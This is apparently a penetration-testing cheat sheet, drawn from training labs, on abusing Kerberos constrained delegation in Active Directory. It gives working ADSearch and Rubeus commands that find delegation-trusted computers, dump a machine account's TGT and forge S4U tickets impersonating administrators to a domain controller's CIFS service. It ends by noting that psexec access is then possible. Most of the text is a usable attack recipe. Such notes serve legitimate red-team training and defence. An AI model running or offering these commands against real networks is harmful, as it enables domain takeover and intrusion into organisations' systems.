Constrained Delegation

Safer means for services to perform Kerberos delegation. It aims to restrict the services to which the server can act on behalf of a user (It no longer allows the server to cache the TGTs of other users).

Search for computers

Whose msds-allowedtodelegateto attribute is not empty

ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Get the TGT of the principal (computer or user) trusted for delegation

Rubeus.exe triage

0x3e4    | sql-2$ @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO

Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

With the TGT, perform S4U request to obtain usable TGS for CIFS

Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap

Where

/impersonateuser is the user we want to impersonate - they should have local admin access on the target machine. /msdsspn is the service principal name that SQL-2 is allowed to delegate to. /user is the principal allowed to perform the delegation. /ticket is the TGT for /user.

Perform an S4U2Self first and then an S4U2Proxy

It's this final S4U2Proxy ticket that we need

Example simple attack chain

In this example 'Blake' has allowedtodelegate.

1. Get a session as Blake, either through RDP or other ways.

2. Request a ticket for current session with Rubeus

1. Using Rubeus, we can now request TGS for [email protected], who will be allowed to authenticate to CIFS/dc.painters.htb

1. We've got the impersonated TGS tickets for administrator account.

   Which as we can see are now in memory of the current logon session.

1. If we now attempt accessing the file system of the dc from the user's terminal, we can confirm we've successfully impersonated the domain administrator account that can authenticate to the CIFS service on the domain controller DC01:

(can now psexec)